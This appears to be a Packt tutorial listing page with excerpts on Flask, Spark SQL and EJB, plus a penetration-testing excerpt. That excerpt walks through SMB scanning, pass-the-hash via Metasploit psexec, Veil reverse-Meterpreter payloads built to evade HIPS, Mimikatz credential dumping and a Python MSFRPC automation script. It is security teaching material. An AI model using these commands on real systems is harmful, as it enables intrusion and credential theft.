Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials

7019 Articles
Packt
24 Sep 2015
8 min read
Save for later

Snap – The Code Snippet Sharing Application

Packt
24 Sep 2015
8 min read
In this article by Joel Perras, author of the book Flask Blueprints, we will build our first fully functional, database-backed application. This application with the codename, Snap, will allow users to create an account with a username and password. In this account, users will be allowed to add, update, and delete the so-called semiprivate snaps of text (with a focus on lines of code) that can be shared with others. For this you should be familiar with at least one of the following relational database systems: PostgreSQL, MySQL, or SQLite. Additionally, some knowledge of the SQLAlchemy Python library, which acts as an abstraction layer and object-relational mapper for these (and several other) databases, will be an asset. If you are not well versed in the usage of SQLAlchemy, fear not. We will have a gentle introduction to the library that will bring the new developers up to speed and serve as a refresher for the more experienced folks. The SQLite database will be our relational database of choice due to its very simple installation and operation. The other database systems that we listed are all client/server-based with a multitude of configuration options that may need adjustment depending on the system they are installed in, while SQLite's default mode of operation is self-contained, serverless, and zero-configuration. Any major relational database supported by SQLAlchemy as a first-class citizen will do. (For more resources related to this topic, see here.) Diving In To make sure things start correctly, let's create a folder where this project will exist and a virtual environment to encapsulate any dependencies that we will require: $ mkdir -p ~/src/snap && cd ~/src/snap $ mkvirtualenv snap -i flask This will create a folder called snap at the given path and take us to this newly created folder. It will then create the snap virtual environment and install Flask in this environment. Remember that the mkvirtualenv tool will create the virtual environment, which will be the default set of locations to install the packages from pip, but the mkvirtualenv command does not create the project folder for you. This is why we will run a command to create the project folder first and then create the virtual environment. Virtual environments, by virtue of the $PATH manipulation performed once they are activated, are completely independent of where in your file system your project files exist. We will then create our basic blueprint-based project layout with an empty users blueprint: application ├── __init__.py ├── run.py └── users ├── __init__.py ├── models.py └── views.py Flask-SQLAlchemy Once this has been established, we need to install the next important set of dependencies: SQLAlchemy, and the Flask extension that makes interacting with this library a bit more Flask-like, Flask-SQLAlchemy: $ pip install flask-sqlalchemy This will install the Flask extension to SQLAlchemy along with the base distribution of the latter and several other necessary dependencies in case they are not already present. Now, if we were using a relational database system other than SQLite, this is the point where we would create the database entity in, say, PostgreSQL along with the proper users and permissions so that our application can create tables and modify the contents of these tables. SQLite, however, does not require any of that. Instead, it assumes that any user that has access to the filesystem location that the database is stored in should also have permission to modify the contents of this database. For the sake of completeness, however, here is how one would create an empty database in the current folder of your filesystem: $ sqlite3 snap.db # hit control-D to escape out of the interactive SQL console if necessary.   As mentioned previously, we will be using SQLite as the database for our example applications and the directions given will assume that SQLite is being used; the exact name of the binary may differ on your system. You can substitute the equivalent commands to create and administer the database of your choice if anything other than SQLite is being used. Now, we can begin the basic configuration of the Flask-SQLAlchemy extension. Configuring Flask-SQLAlchemy First, we must register the Flask-SQLAlchemy extension with the application object in the application/__init__.py: from flask import Flask fromflask.ext.sqlalchemy import SQLAlchemy app = Flask(__name__) app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///../snap.db' db = SQLAlchemy(app) The value of app.config['SQLALCHEMY_DATABASE_URI'] is the escaped relative path to the snap.db SQLite database that we created previously. Once this simple configuration is in place, we will be able to create the SQLite database automatically via the db.create_all() method, which can be invoked in an interactive Python shell: $ python >>>from application import db >>>db.create_all() This should be an idempotent operation, which means that nothing would change even if the database already exists. If the local database file did not exist, however, it would be created. This also applies to adding new data models: running db.create_all() will add their definitions to the database, ensuring that the relevant tables have been created and are accessible. It does not, however, take into account the modification of an existing model/table definition that already exists in the database. For this, you will need to use the relevant tools (for example, the sqlite CLI) to modify the corresponding table definitions to match those that have been updated in your models or use a more general schema tracking and updating tool such as Alembic to do the majority of the heavy lifting for you. SQLAlchemy basics SQLAlchemy is, first and foremost, a toolkit to interact with the relational databases in Python. While it provides an incredible number of features—including the SQL connection handling and pooling for various database engines, ability to handle custom datatypes, and a comprehensive SQL expression API—the one feature that most developers are familiar with is the Object Relational Mapper. This mapper allows a developer to connect a Python object definition to a SQL table in the database of their choice, thus allowing them the flexibility to control the domain models in their own application and requiring only minimal coupling to the database product and the engine-specific SQLisms that each of them exposes. While debating the usefulness (or the lack thereof) of an object relational mapper is outside the scope of for those who are unfamiliar with SQLAlchemy we will provide a list of benefits that using this tool brings to the table, as follows: Your domain models are written to interface with one of the most well-respected, tested, and deployed Python packages ever created—SQLAlchemy. Onboarding new developers to a project becomes an order of magnitude easier due to the extensive documentation, tutorials, books, and articles that have been written about using SQLAlchemy. Import-time validation of queries written using the SQLAlchemy expression language; instead of having to execute each query string against the database to determine if there is a syntax error present. The expression language is in Python and can thus be validated with your usual set of tools and IDE. Thanks to the implementation of design patterns such as the Unit of Work, the Identity Map, and various lazy loading features, the developer can often be saved from performing more database/network roundtrips than necessary. Considering that the majority of a request/response cycle in a typical web application can easily be attributed to network latency of one form or another, minimizing the number of database queries in a typical response is a net performance win on many fronts. While many successful, performant applications can be built entirely on the ORM, SQLAlchemy does not force it upon you. If, for some reason, it is preferable to write raw SQL query strings or to use the SQLAlchemy expression language directly, then you can do that and still benefit from the connection pooling and the Python DBAPI abstraction functionality that is the core of SQLAlchemy itself. Now that we've given you several reasons why you should be using this database query and domain data abstraction layer, let's look at how we would go about defining a basic data model. Summary After having gone through this article we have seen several facets of how Flask may be augmented with the use of extensions. While Flask itself is relatively spartan, the ecology of extensions that are available make it such that building a fully fledged user-authenticated application may be done quickly and relatively painlessly. Resources for Article: Further resources on this subject: Creating Controllers with Blueprints[article] Deployment and Post Deployment [article] Man, Do I Like Templates! [article]
Read more
  • 0
  • 0
  • 3109

article-image-integration-spark-sql
Packt
24 Sep 2015
11 min read
Save for later

Integration with Spark SQL

Packt
24 Sep 2015
11 min read
 In this article by Sumit Gupta, the author of the book Learning Real-time Processing with Spark Streaming, we will discuss the integration of Spark Streaming with various other advance Spark libraries such as Spark SQL. (For more resources related to this topic, see here.) No single software in today's world can fulfill the varied, versatile, and complex demands/needs of the enterprises, and to be honest, neither should it! Software are made to fulfill specific needs arising out of the enterprises at a particular point in time, which may change in future due to many other factors. These factors may or may not be controlled like government policies, business/market dynamics, and many more. Considering all these factors integration and interoperability of any software system with internal/external systems/software's is pivotal in fulfilling the enterprise needs. Integration and interoperability are categorized as nonfunctional requirements, which are always implicit and may or may not be explicitly stated by the end users. Over the period of time, architects have realized the importance of these implicit requirements in modern enterprises, and now, all enterprise architectures provide support due diligence and provisions in fulfillment of these requirements. Even the enterprise architecture frameworks such as The Open Group Architecture Framework (TOGAF) defines the specific set of procedures and guidelines for defining and establishing interoperability and integration requirements of modern enterprises. Spark community realized the importance of both these factors and provided a versatile and scalable framework with certain hooks for integration and interoperability with the different systems/libraries; for example; data consumed and processed via Spark streams can also be loaded into the structured (table: rows/columns) format and can be further queried using SQL. Even the data can be stored in the form of Hive tables in HDFS as persistent tables, which will exist even after our Spark program has restarted. In this article, we will discuss querying streaming data in real time using Spark SQL. Querying streaming data in real time Spark Streaming is developed on the principle of integration and interoperability where it not only provides a framework for consuming data in near real time from varied data sources, but at the same time, it also provides the integration with Spark SQL where existing DStreams can be converted into structured data format for querying using standard SQL constructs. There are many such use cases where SQL on streaming data is a much needed feature; for example, in our distributed log analysis use case, we may need to combine the precomputed datasets with the streaming data for performing exploratory analysis using interactive SQL queries, which is difficult to implement only with streaming operators as they are not designed for introducing new datasets and perform ad hoc queries. Moreover SQL's success at expressing complex data transformations derives from the fact that it is based on a set of very powerful data processing primitives that do filtering, merging, correlation, and aggregation, which is not available in the low-level programming languages such as Java/ C++ and may result in long development cycles and high maintenance costs. Let's move forward and first understand few things about Spark SQL, and then, we will also see the process of converting existing DStreams into the Structured formats. Understanding Spark SQL Spark SQL is one of the modules developed over the Spark framework for processing structured data, which is stored in the form of rows and columns. At a very high level, it is similar to the data residing in RDBMS in the form rows and columns, and then SQL queries are executed for performing analysis, but Spark SQL is much more versatile and flexible as compared to RDBMS. Spark SQL provides distributed processing of SQL queries and can be compared to frameworks Hive/Impala or Drill. Here are the few notable features of Spark SQL: Spark SQL is capable of loading data from variety of data sources such as text files, JSON, Hive, HDFS, Parquet format, and of course RDBMS too so that we can consume/join and process datasets from different and varied data sources. It supports static and dynamic schema definition for the data loaded from various sources, which helps in defining schema for known data structures/types, and also for those datasets where the columns and their types are not known until runtime. It can work as a distributed query engine using the thrift JDBC/ODBC server or command-line interface where end users or applications can interact with Spark SQL directly to run SQL queries. Spark SQL provides integration with Spark Streaming where DStreams can be transformed into the structured format and further SQL Queries can be executed. It is capable of caching tables using an in-memory columnar format for faster reads and in-memory data processing. It supports Schema evolution so that new columns can be added/deleted to the existing schema, and Spark SQL still maintains the compatibility between all versions of the schema. Spark SQL defines the higher level of programming abstraction called DataFrames, which is also an extension to the existing RDD API. Data frames are the distributed collection of the objects in the form of rows and named columns, which is similar to tables in the RDBMS, but with much richer functionality containing all the previously defined features. The DataFrame API is inspired by the concepts of data frames in R (http://www.r-tutor.com/r-introduction/data-frame) and Python (http://pandas.pydata.org/pandas-docs/stable/dsintro.html#dataframe). Let's move ahead and understand how Spark SQL works with the help of an example: As a first step, let's create sample JSON data about the basic information about the company's departments such as Name, Employees, and so on, and save this data into the file company.json. The JSON file would look like this: [ { "Name":"DEPT_A", "No_Of_Emp":10, "No_Of_Supervisors":2 }, { "Name":"DEPT_B", "No_Of_Emp":12, "No_Of_Supervisors":2 }, { "Name":"DEPT_C", "No_Of_Emp":14, "No_Of_Supervisors":3 }, { "Name":"DEPT_D", "No_Of_Emp":10, "No_Of_Supervisors":1 }, { "Name":"DEPT_E", "No_Of_Emp":20, "No_Of_Supervisors":5 } ] You can use any online JSON editor such as http://codebeautify.org/online-json-editor to see and edit data defined in the preceding JSON code. Next, let's extend our Spark-Examples project and create a new package by the name chapter.six, and within this new package, create a new Scala object and name it as ScalaFirstSparkSQL.scala. Next, add the following import statements just below the package declaration: import org.apache.spark.SparkConf import org.apache.spark.SparkContext import org.apache.spark.sql._ import org.apache.spark.sql.functions._ Further, in your main method, add following set of statements to create SQLContext from SparkContext: //Creating Spark Configuration val conf = new SparkConf() //Setting Application/ Job Name conf.setAppName("My First Spark SQL") // Define Spark Context which we will use to initialize our SQL Context val sparkCtx = new SparkContext(conf) //Creating SQL Context val sqlCtx = new SQLContext(sparkCtx) SQLContext or any of its descendants such as HiveContext—for working with Hive tables or CassandraSQLContext—for working with Cassandra tables is the main entry point for accessing all functionalities of Spark SQL. It allows the creation of data frames, and also provides functionality to fire SQL queries over data frames. Next, we will define the following code to load the JSON file (company.json) using the SQLContext, and further, we will also create a data frame: //Define path of your JSON File (company.json) which needs to be processed val path = "/home/softwares/spark/data/company.json"; //Use SQLCOntext and Load the JSON file. //This will return the DataFrame which can be further Queried using SQL queries. val dataFrame = sqlCtx.jsonFile(path) In the preceding piece of code, we used the jsonFile(…) method for loading the JSON data. There are other utility method defined by SQLContext for reading raw data from filesystem or creating data frames from the existing RDD and many more. Spark SQL supports two different methods for converting the existing RDDs into data frames. The first method uses reflection to infer the schema of an RDD from the given data. This approach leads to more concise code and helps in instances where we already know the schema while writing Spark application. We have used the same approach in our example. The second method is through a programmatic interface that allows to construct a schema. Then, apply it to an existing RDD and finally generate a data frame. This method is more verbose, but provides flexibility and helps in those instances where columns and data types are not known until the data is received at runtime. Refer to https://spark.apache.org/docs/1.3.0/api/scala/index.html#org.apache.spark.sql.SQLContext for a complete list of methods exposed by SQLContext. Once the DataFrame is created, we need to register DataFrame as a temporary table within the SQL context so that we can execute SQL queries over the registered table. Let's add the following piece of code for registering our DataFrame with our SQL context and name it company: //Register the data as a temporary table within SQL Context //Temporary table is destroyed as soon as SQL Context is destroyed. dataFrame.registerTempTable("company"); And we are done… Our JSON data is automatically organized into the table (rows/column) and is ready to accept the SQL queries. Even the data types is inferred from the type of data entered within the JSON file itself. Now, we will start executing the SQL queries on our table, but before that let's see the schema being created/defined by SQLContext: //Printing the Schema of the Data loaded in the Data Frame dataFrame.printSchema(); The execution of the preceding statement will provide results similar to mentioned illustration: The preceding illustration shows the schema of the JSON data loaded by Spark SQL. Pretty simple and straight, isn't it? Spark SQL has automatically created our schema based on the data defined in our company.json file. It has also defined the data type of each of the columns. We can also define the schema using reflection (https://spark.apache.org/docs/1.3.0/sql-programming-guide.html#inferring-the-schema-using-reflection) or can also programmatically define the schema (https://spark.apache.org/docs/1.3.0/sql-programming-guide.html#inferring-the-schema-using-reflection). Next, let's execute some SQL queries to see the data stored in DataFrame, so the first SQL would be to print all records: //Executing SQL Queries to Print all records in the DataFrame println("Printing All records") sqlCtx.sql("Select * from company").collect().foreach(print) The execution of the preceding statement will produce the following results on the console where the driver is executed: Next, let's also select only few columns instead of all records and print the same on console: //Executing SQL Queries to Print Name and Employees //in each Department println("n Printing Number of Employees in All Departments") sqlCtx.sql("Select Name, No_Of_Emp from company").collect().foreach(println) The execution of the preceding statement will produce the following results on the Console where the driver is executed: Now, finally let's do some aggregation and count the total number of all employees across the departments: //Using the aggregate function (agg) to print the //total number of employees in the Company println("n Printing Total Number of Employees in Company_X") val allRec = sqlCtx.sql("Select * from company").agg(Map("No_Of_Emp"->"sum")) allRec.collect.foreach ( println ) In the preceding piece of code, we used the agg(…) function and performed the sum of all employees across the departments, where sum can be replaced by avg, max, min, or count. The execution of the preceding statement will produce the following results on the console where the driver is executed: The preceding images shows the results of executing the aggregation on our company.json data. Refer to the Data Frame API at https://spark.apache.org/docs/1.3.0/api/scala/index.html#org.apache.spark.sql.DataFrame for further information on the available functions for performing aggregation. As a last step, we will stop our Spark SQL context by invoking the stop() function on SparkContext—sparkCtx.stop(). This is required so that your application can notify master or resource manager to release all resources allocated to the Spark job. It also ensures the graceful shutdown of the job and avoids any resource leakage, which may happen otherwise. Also, as of now, there can be only one Spark context active per JVM, and we need to stop() the active SparkContext class before creating a new one. Summary In this article, we have seen the step-by-step process of using Spark SQL as a standalone program. Though we have considered JSON files as an example, but we can also leverage Spark SQL with Cassandra (https://github.com/datastax/spark-cassandra-connector/blob/master/doc/2_loading.md) or MongoDB (https://github.com/Stratio/spark-mongodb) or Elasticsearch (http://chapeau.freevariable.com/2015/04/elasticsearch-and-spark-1-dot-3.html). Resources for Article: Further resources on this subject: Getting Started with Apache Spark DataFrames[article] Sabermetrics with Apache Spark[article] Getting Started with Apache Spark [article]
Read more
  • 0
  • 0
  • 4455

article-image-exploiting-services-python
Packt
24 Sep 2015
15 min read
Save for later

Exploiting Services with Python

Packt
24 Sep 2015
15 min read
In this article by Christopher Duffy author of the book Learning Python Penetration Testing, we will learn about one of the big misconceptions with testing for the synchronization of account credentials today, is the prevalence of exploitable. You will still find vulnerabilities that can be exploited by overflowing the stack or heap, they are just significantly reduced or more complex. (For more resources related to this topic, see here.) Testing for the synchronization of account credentials With these results, we can determine if any of these credentials are reused in the network. We know there are Windows hosts primarily in the target network, but we need to identify which ones have port 445 open. We can then try and determine, which accounts might grant us access, when the following command is run: nmap -sS -vvv -p445 192.168.195.0/24 -oG output Then, parse the results for open ports with the following command, which will provide a file of target hosts with Server Message Block (SMB) enabled. grep 445/open output| cut -d" " -f2 >> smb_hosts The passwords can be extracted directly from John and written a password file that can be used for follow-on service attacks. john --show unshadowed |cut -d: -f2|grep -v " " > passwords Always test on a single host the first time you run this type of attack. In this example, we are using the sys account, but it is more common to use the root account or similar administrative accounts to test password reuse (synchronization) in an environment. The following attack using auxiliary/scanner/smb/smb_enumusers_domain will check for two things. It will identify what systems this account has access to, and the relevant users that are currently logged into the system. In the second portion of this example, we will highlight how to identify the accounts that are actually privileged and part of the Domain. There are good points and bad points about the smb_enumusers_domain module. The bad points are that you cannot load multiple usernames and passwords into it. That capability is reserved for the smb_login module. The problem with smb_login is that it is extremely noisy, as many signature detection tools flag on this method of testing for logins. The third module smb_enumusers, which can be used, but it only provides details related to locale users as it identifies users based on the Security Accounts Manager (SAM) file contents. So, if a user has a Domain account and has logged into the box, the smb_enumusers module will not identify them. So, understand each module and its limitations when identifying targets to laterally move. We are going to highlight how to configure the smb_enumusers_domain module and execute it. This will show an example of gaining access to a vulnerable host and then verifying DA account membership. This information can then be used to identify where a DA is located so that Mimikatz can be used to extract credentials. For this example, we are going to use a custom exploit using Veil as well, to attempt to bypass a resident Host Intrusion Prevention System (HIPS). More information about Veil can be found here at https://github.com/Veil-Framework/Veil-Evasion.git. So, we configure the module to use the password batman, and we target the local administrator account on the system. This can be changed, but often the default is used. Since it is the local administrator, the Domain is set to WORKGROUP. The following figure shows the configuration of the module: Before running commands such as these, make sure to use spool, to output the results to a log file so you can go back and review the results. As you can see in the following figure, the account provided details about who was logged into the system. This means that there are logged in users relevant to the returned account names and that the local administrator account will work on that system. This means this system is ripe for compromise by a Pass-the-Hash attack (PtH). The psexec module allows you to either pass the extracted Local Area Network Manager (LM): New Technology LM (NTLM) hash and username combination or just the username password pair to get access. To begin with, we setup a custom multi/handler to catch the custom exploit we generated by Veil as shownfollowing. Keep in mind, I used 443 for the local port because it bypasses most HIPS and the local host will change depending on your host. Now, we need to generate custom payloads with Veil to be used with the psexec module. You can do this by navigating to the Veil-Evasion installation directory and running it with python Veil-Evasion.py. Veil has a good number of payloads that can be generated with a variety of obfuscation or protection mechanisms, to see the specific payload you want to use, to execute the list command. You can select the payload by typing in the number of the payload or the name. As an example, run the following commands to generate a C Sharp stager that does not use shell code, keep in mind this requires specific versions of .NET on the target box to work. use cs/meterpreter/rev_tcp set LPORT 443 set LHOST 192.168.195.160 set use_arya Y generate There are two components to a typical payload, the stager and the stage. A stager sets up the network connection between the attacker and the victim. Payloads that often use native system languages can be purely stager. The second part is the stage, which are the components that are downloaded by the stager. These can include things like your Meterpreter. If both items are combined, they are called a single; think about when you create your malicious Universal Serial Bus (USB) drives, these are often singles. The output will be an executable, that will spawn an encrypted reverse HyperText Transfer Protocol Secure (HTTPS) Meterpreter. The payload can be tested with the script checkvt, which safely verifies if the payload would be picked up by most HIPS solutions. It does this without uploading it to Virus Total, and in turn does not add the payload to the database, which many HIPS providers pull from. Instead, it compares the hash of the payload to those already in the database. Now, we can setup the psexec module to reference the custom payload for execution. Update the psexec module, so that it uses the custom payload generated by Veil-Evasion, via set EXE::Custom and disable the automatic payload handler with set DisablePayloadHandler true, as shown following: Exploit the target box, and then attempt to identify who the DAs are in the Domain. This can be done in one of two ways, either by using the post/windows/gather/enum_domain_group_users module or the following command from shell access. net group "Domain Admins" We can then Grep through the spooled output file from the previously run module to locate relevant systems that might have these Das logged into. When gaining access to one of those systems, there would likely be DA tokens or credentials in memory, which can be extracted and reused. The following command is an example of how to analyze the log file for these types of entries. grep <username> <spoofile.log> As you can see, this very simple exploit path allows you to identify where the DAs are. Once you are on the system all you have to do is load mimikatz and extract the credentials typically with the wdigest command from the established Meterpreter session. Of course, this means the system has to be newer than Windows 2000, and have active credentials in memory. If not, it will take additional effort and research to move forward. To highlight this, we use our established session to extract credentials with Mimikatz as you can see following. The credentials are in memory and since the target box was Windows XP machine, we have no conflicts and no additional research is required. In addition to the intelligence we have gathered from extracting the active DA list from the system, we now have another set of confirmed credentials that can be used. Rinsing and repeating this method of attack allows you to quickly move laterally around the network till you identify viable targets. Automating the exploit train with Python This exploit train is relatively simple, but we can automate a portion of this with the Metasploit Remote Procedure Call (MSFRPC). This script will use the nmap library to scan for active ports of 445, then generate a list of targets to test using a username and password passed via argument to the script. The script will use the same smb_enumusers_domain module to identify boxes that have the credentials reused and other viable users logged into them. First, we need to install SpiderLabs msfrpc library for Python. This library can be found here at https://github.com/SpiderLabs/msfrpc.git. The script we are creating uses the netifaces library to identify what interface IP addresses belong to your host. It then scans for port 445 the SMB port on the IP address, range, or the Classes Inter Domain Routing (CIDR) address. It eliminates any IP addresses that belong to your interface and then tests the credentials using the Metasploit module auxiliary/scanner/smb/smb_enumusers_domain. At the same time, it verifies what users are logged onto the system. The outputs of this script in addition to real time response are two files, a log file that contains all the responses, and a file that holds the IP addresses for all the hosts that have SMB services. This Metasploit module takes advantage of RPCDCE, which does not run on port 445, but we are verifying that the service is available for follow-on exploitation. This file could then be fed back into the script, if you as an attacker find other credential sets to test as shown following: Lastly, the script can be passed hashes directly just like the Metasploit module as shown following: The output will be slightly different for each running of the script, depending on the console identifier you grab to execute the command. The only real difference will be the additional banner items typical with a Metasploit console initiation. Now there are a couple things that have to be stated, yes you could just generate a resource file, but when you start getting into organizations that have millions of IP addresses, this becomes unmanageable. Also the MSFRPC can have resource files fed directly into it as well, but it can significantly slow the process. If you want to compare, rewrite this script to do the same test as the previous ssh_login.py script you wrote, but with direct MSFRPC integration. Like all scripts libraries are needed to be established, most of these you are already familiar with, the newest one relates to the MSFRPC by SpiderLabs. The required libraries for this script can be seen as follows: import os, argparse, sys, time try: import msfrpc except: sys.exit("[!] Install the msfrpc library that can be found here: https://github.com/SpiderLabs/msfrpc.git") try: import nmap except: sys.exit("[!] Install the nmap library: pip install python- nmap") try: import netifaces except: sys.exit("[!] Install the netifaces library: pip install netifaces") We then build a module, to identify relevant targets that are going to have the auxiliary module run against it. First, we setup the constructors and the passed parameters. Notice that we have two service names to test against for this script, microsoft-ds and netbios-ssn, as either one could represent port 445 based on the nmap results. def target_identifier(verbose, dir, user, passwd, ips, port_num, ifaces, ipfile): hostlist = [] pre_pend = "smb" service_name = "microsoft-ds" service_name2 = "netbios-ssn" protocol = "tcp" port_state = "open" bufsize = 0 hosts_output = "%s/%s_hosts" % (dir, pre_pend) After which, we configure the nmap scanner to scan for details either by file or by command line. Notice that the hostlist is a string of all the addresses loaded by the file, and they are separated by spaces. The ipfile is opened and read and then all newlines are replaced with spaces as they are loaded into the string. This is a requirement for the specific hosts argument of the nmap library. if ipfile != None: if verbose > 0: print("[*] Scanning for hosts from file %s") % (ipfile) with open(ipfile) as f: hostlist = f.read().replace('n',' ') scanner.scan(hosts=hostlist, ports=port_num) else: if verbose > 0: print("[*] Scanning for host(s) %s") % (ips) scanner.scan(ips, port_num) open(hosts_output, 'w').close() hostlist=[] if scanner.all_hosts(): e = open(hosts_output, 'a', bufsize) else: sys.exit("[!] No viable targets were found!") The IP addresses for all of the interfaces on the attack system are removed from the test pool. for host in scanner.all_hosts(): for k,v in ifaces.iteritems(): if v['addr'] == host: print("[-] Removing %s from target list since it belongs to your interface!") % (host) host = None Finally, the details are then written to the relevant output file and python lists, and then returned to the original call origin. if host != None: e = open(hosts_output, 'a', bufsize) if service_name or service_name2 in scanner[host][protocol][int(port_num)]['name']: if port_state in scanner[host][protocol][int(port_num)]['state']: if verbose > 0: print("[+] Adding host %s to %s since the service is active on %s") % (host, hosts_output, port_num) hostdata=host + "n" e.write(hostdata) hostlist.append(host) else: if verbose > 0: print("[-] Host %s is not being added to %s since the service is not active on %s") % (host, hosts_output, port_num) if not scanner.all_hosts(): e.closed if hosts_output: return hosts_output, hostlist The next function creates the actual command that will be executed; this function will be called for each host the scan returned back as a potential target. def build_command(verbose, user, passwd, dom, port, ip): module = "auxiliary/scanner/smb/smb_enumusers_domain" command = '''use ''' + module + ''' set RHOSTS ''' + ip + ''' set SMBUser ''' + user + ''' set SMBPass ''' + passwd + ''' set SMBDomain ''' + dom +''' run ''' return command, module The last function actually initiates the connection with the MSFRPC and executes the relevant command per specific host. def run_commands(verbose, iplist, user, passwd, dom, port, file): bufsize = 0 e = open(file, 'a', bufsize) done = False The script creates a connection with the MSFRPC and creates console then tracks it by a specific console_id. Do not forget, the msfconsole can have multiple sessions, and as such we have to track our session to a console_id. client = msfrpc.Msfrpc({}) client.login('msf','msfrpcpassword') try: result = client.call('console.create') except: sys.exit("[!] Creation of console failed!") console_id = result['id'] console_id_int = int(console_id) The script then iterates over the list of IP addresses that were confirmed to have an active SMB service. The script then creates the necessary commands for each of those IP addresses. for ip in iplist: if verbose > 0: print("[*] Building custom command for: %s") % (str(ip)) command, module = build_command(verbose, user, passwd, dom, port, ip) if verbose > 0: print("[*] Executing Metasploit module %s on host: %s") % (module, str(ip)) The command is then written to the console and we wait for the results. client.call('console.write',[console_id, command]) time.sleep(1) while done != True: We await the results for each command execution and verify the data that has been returned and that the console is not still running. If it is, we delay the reading of the data. Once it has completed, the results are written in the specified output file. result = client.call('console.read',[console_id_int]) if len(result['data']) > 1: if result['busy'] == True: time.sleep(1) continue else: console_output = result['data'] e.write(console_output) if verbose > 0: print(console_output) done = True We close the file and destroy the console to clean up the work we had done. e.closed client.call('console.destroy',[console_id]) The final pieces of the script are related to setting up the arguments, setting up the constructors and calling the modules. These components are similar to previous scripts and have not been included here for the sake of space, but the details can be found at the previously mentioned location on GitHub. The last requirement is loading of the msgrpc at the msfconsole with the specific password that we want. So launch the msfconsole and then execute the following within it. load msgrpc Pass=msfrpcpassword The command was not mistyped, Metasploit has moved to msgrpc verses msfrpc, but everyone still refers to it as msfrpc. The big difference is the msgrpc library uses POST requests to send data while msfrpc used eXtensible Markup Language (XML). All of this can be automated with resource files to set up the service. Summary In this article, we highlighted a manner in which you can move through a sample environment. Specifically, how to exploit a relative box, escalate privileges, and extract additional credentials. From that position, we identified other viable hosts we could laterally move into and the users who were currently logged into them. We generated custom payloads with the Veil Framework to bypass HIPS, and executed a PtH attack. This allowed us to extract other credentials from memory with the tool Mimikatz. We then automated the identification of viable secondary targets and the users logged into them with Python and MSFRPC. Resources for Article: Further resources on this subject: Basics of Jupyter Notebook and Python[article] Scraping the Data[article] Modeling complex functions with artificial neural networks [article]
Read more
  • 0
  • 0
  • 16067

article-image-creating-jee-application-ejb
Packt
24 Sep 2015
11 min read
Save for later

Creating a JEE Application with EJB

Packt
24 Sep 2015
11 min read
In this article by Ram Kulkarni, author of Java EE Development with Eclipse (e2), we will be using EJBs (Enterprise Java Beans) to implement business logic. This is ideal in scenarios where you want components that process business logic to be distributed across different servers. But that is just one of the advantages of EJB. Even if you use EJBs on the same server as the web application, you may gain from a number of services that the EJB container provides to the applications through EJBs. You can specify security constraints for calling EJB methods declaratively (using annotations), and you can also easily specify transaction boundaries (specify which method calls from a part of one transaction) using annotations. In addition to this, the container handles the life cycle of EJBs, including pooling of certain types of EJB objects so that more objects can be created when the load on the application increases. (For more resources related to this topic, see here.) In this article, we will create the same application using EJBs and deploy it in a Glassfish 4 server. But before that, you need to understand some basic concepts of EJBs. Types of EJB EJBs can be of following types as per the EJB 3 specifications: Session bean: Stateful session bean Stateless session bean Singleton session bean Message-driven bean In this article, we will focus on session beans. Session beans In general, session beans are meant for containing methods used to execute the main business logic of enterprise applications. Any Plain Old Java Object (POJO) can be annotated with the appropriate EJB-3-specific annotations to make it a session bean. Session beans come in three types, as follows. Stateful session bean One stateful session bean serves requests for one client only. There is a one-to-one mapping between the stateful session bean and the client. Therefore, stateful beans can hold state data for the client between multiple method calls. In our CourseManagement application, we can use a stateful bean to hold the Student data (student profile and the courses taken by him/her) after a student logs-in. The state maintained by the Stateful bean is lost when the server restarts or when the session times out. Since there is one stateful bean per client, using a stateful bean might impact the scalability of the application. We use the @Stateful annotation to create a stateful session bean. Stateless session bean A stateless session bean does not hold any state information for any client. Therefore, one session bean can be shared across multiple clients. The EJB container maintains pools of stateless beans, and when a client request comes, it takes out a bean from the pool, executes methods, and returns the bean to the pool. Stateless session beans provide excellent scalability because they can be shared and need not be created for each client. We use the @Stateless annotation to create a stateless session bean. Singleton session bean As the name suggests, there is only one instance of a singleton bean class in the EJB container (this is true in the clustered environment too; each EJB container will have an instance of a singleton bean). This means that they are shared by multiple clients, and they are not pooled by EJB containers (because there can be only one instance). Since a singleton session bean is a shared resource, we need to manage concurrency in it. Java EE provides two concurrency management options for singleton session beans: container-managed concurrency and bean-managed concurrency. Container-managed concurrency can easily be specified by annotations. See https://docs.oracle.com/javaee/7/tutorial/ejb-basicexamples002.htm#GIPSZ for more information on managing concurrency in a singleton session bean. Using a singleton bean could have an impact on the scalability of the application if there are resource contentions in the code. We use the @Singleton annotation to create a singleton session bean Accessing a session bean from the client Session beans can be designed to be accessed locally (within the same application as a session bean) or remotely (from a client running in a different application or JVM) or both. In the case of remote access, session beans are required to implement a remote interface. For local access, session beans can implement a local interface or no interface (the no-interface view of a session bean). Remote and local interfaces that session beans implement are sometimes also called business interfaces, because they typically expose the primary business functionality. Creating a no-interface session bean To create a session bean with a no-interface view, create a POJO and annotate it with the appropriate EJB annotation type and @LocalBean. For example, we can create a local stateful Student bean as follows: import javax.ejb.LocalBean; import javax.ejb.Singleton; @Singleton @LocalBean public class Student { ... } Accessing a session bean using dependency injection You can access session beans by either using the @EJBannotation (for dependency injection) or performing a Java Naming and Directory Interface (JNDI) lookup. EJB containers are required to make the JNDI URLs of EJBs available to clients. Dependency injection of session beans using @EJB work only for managed components, that is, components of the application whose life cycle is managed by the EJB container. When a component is managed by the container, it is created (instantiated) by the container and also destroyed by the container. You do not create managed components using the new operator. JEE-managed components that support direct injection of EJBs are servlets, managed beans of JSF pages and EJBs themselves (one EJB can have other EJBs injected into it). Unfortunately, you cannot have a web container injecting EJBs into JSPs or JSP beans. Also, you cannot have EJBs injected into any custom classes that you create and are instantiated using the new operator. We can use the Student bean (created previously) from a managed bean of JSF, as follows: import javax.ejb.EJB; import javax.faces.bean.ManagedBean; @ManagedBean public class StudentJSFBean { @EJB private Student studentEJB; } Note that if you create an EJB with a no-interface view, then all the public methods in that EJB will be exposed to the clients. If you want to control which methods can be called by clients, then you should implement the business interface. Creating a session bean using a local business interface A business interface for EJB is a simple Java interface with either the @Remote or @Local annotation. So we can create a local interface for the Student bean as follows: import java.util.List; import javax.ejb.Local; @Local public interface StudentLocal { public List<Course> getCourses(); } We implement a session bean like this: import java.util.List; import 